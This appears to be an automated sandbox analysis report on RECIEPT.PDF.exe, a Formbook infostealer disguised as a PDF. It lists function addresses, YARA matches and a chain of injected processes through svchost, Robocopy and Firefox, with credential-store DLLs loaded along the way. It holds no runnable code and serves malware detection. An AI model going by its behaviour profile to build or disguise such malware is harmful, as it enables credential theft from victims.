          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeCode function: 5_2_054441BB5_2_054441BB
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C24466_2_046C2446
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046B44206_2_046B4420
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046BE4F66_2_046BE4F6
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046105356_2_04610535
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046D05916_2_046D0591
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462C6E06_2_0462C6E0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046107706_2_04610770
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046347506_2_04634750
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460C7C06_2_0460C7C0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046A20006_2_046A2000
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046981586_2_04698158
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046001006_2_04600100
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046AA1186_2_046AA118
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C81CC6_2_046C81CC
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046D01AA6_2_046D01AA
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C41A26_2_046C41A2
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046B02746_2_046B0274
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046902C06_2_046902C0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CA3526_2_046CA352
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046D03E66_2_046D03E6
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461E3F06_2_0461E3F0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04610C006_2_04610C00
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04600CF26_2_04600CF2
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046B0CB56_2_046B0CB5
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461AD006_2_0461AD00
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046ACD1F6_2_046ACD1F
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460ADE06_2_0460ADE0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04628DBF6_2_04628DBF
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04610E596_2_04610E59
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CEE266_2_046CEE26
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CEEDB6_2_046CEEDB
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04622E906_2_04622E90
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CCE936_2_046CCE93
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04684F406_2_04684F40
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04652F286_2_04652F28
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04630F306_2_04630F30
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046B2F306_2_046B2F30
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461CFE06_2_0461CFE0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04602FC86_2_04602FC8
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0468EFA06_2_0468EFA0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461A8406_2_0461A840
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046128406_2_04612840
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0463E8F06_2_0463E8F0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045F68B86_2_045F68B8
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046269626_2_04626962
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046129A06_2_046129A0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046DA9A66_2_046DA9A6
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460EA806_2_0460EA80
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CAB406_2_046CAB40
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C6BD76_2_046C6BD7
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046014606_2_04601460
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CF43F6_2_046CF43F
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C75716_2_046C7571
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046AD5B06_2_046AD5B0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C16CC6_2_046C16CC
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CF7B06_2_046CF7B0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C70E96_2_046C70E9
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CF0E06_2_046CF0E0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046170C06_2_046170C0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046BF0CC6_2_046BF0CC
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046DB16B6_2_046DB16B
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0464516C6_2_0464516C
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045FF1726_2_045FF172
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461B1B06_2_0461B1B0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046B12ED6_2_046B12ED
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462B2C06_2_0462B2C0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046152A06_2_046152A0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045FD34C6_2_045FD34C
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C132D6_2_046C132D
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0465739A6_2_0465739A
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04689C326_2_04689C32
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CFCF26_2_046CFCF2
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C7D736_2_046C7D73
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04613D406_2_04613D40
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C1D5A6_2_046C1D5A
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FDC06_2_0462FDC0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04619EB06_2_04619EB0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CFF096_2_046CFF09
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CFFB16_2_046CFFB1
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04611F926_2_04611F92
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0467D8006_2_0467D800
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046138E06_2_046138E0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046199506_2_04619950
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462B9506_2_0462B950
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046A59106_2_046A5910
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04683A6C6_2_04683A6C
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CFA496_2_046CFA49
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046C7A466_2_046C7A46
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046BDAC66_2_046BDAC6
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04655AA06_2_04655AA0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046ADAAC6_2_046ADAAC
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046B1AA36_2_046B1AA3
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046CFB766_2_046CFB76
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04685BF06_2_04685BF0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0464DBF96_2_0464DBF9
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FB806_2_0462FB80
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004E1D306_2_004E1D30
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004DCC0E6_2_004DCC0E
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004DCC106_2_004DCC10
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004DCE306_2_004DCE30
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004DAEB06_2_004DAEB0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004E53E06_2_004E53E0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004E35D06_2_004E35D0
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004FBA706_2_004FBA70
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0431E4E46_2_0431E4E4
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_043255DC6_2_043255DC
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0431E6046_2_0431E604
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_043257686_2_04325768
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0431E98E6_2_0431E98E
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0431DA086_2_0431DA08
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 102 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: String function: 004115D7 appears 36 times
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: String function: 00416C70 appears 39 times
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: String function: 00445AE0 appears 65 times
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 0467EA12 appears 86 times
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04657E54 appears 102 times
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04645130 appears 58 times
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 0468F290 appears 105 times
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 045FB970 appears 280 times
          Source: RECIEPT.PDF.exe, 00000000.00000003.2398583471.000000000489D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RECIEPT.PDF.exe
          Source: RECIEPT.PDF.exe, 00000000.00000003.2398347639.00000000046F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RECIEPT.PDF.exe
          Source: RECIEPT.PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4786140972.0000000005440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2668528829.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2668528829.0000000005BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4786140972.0000000004A40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/13
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\outbluffedJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCommand line argument: v0_2_0040D6B0
          Source: RECIEPT.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Robocopy.exe, 00000006.00000002.4781250480.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4781250480.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2864232988.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2862037554.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2861918501.0000000000794000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: RECIEPT.PDF.exeReversingLabs: Detection: 42%
          Source: RECIEPT.PDF.exeVirustotal: Detection: 46%
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeFile read: C:\Users\user\Desktop\RECIEPT.PDF.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RECIEPT.PDF.exe "C:\Users\user\Desktop\RECIEPT.PDF.exe"
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RECIEPT.PDF.exe"
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RECIEPT.PDF.exe"Jump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeSection loaded: rasadhlp.dllJump to behavior
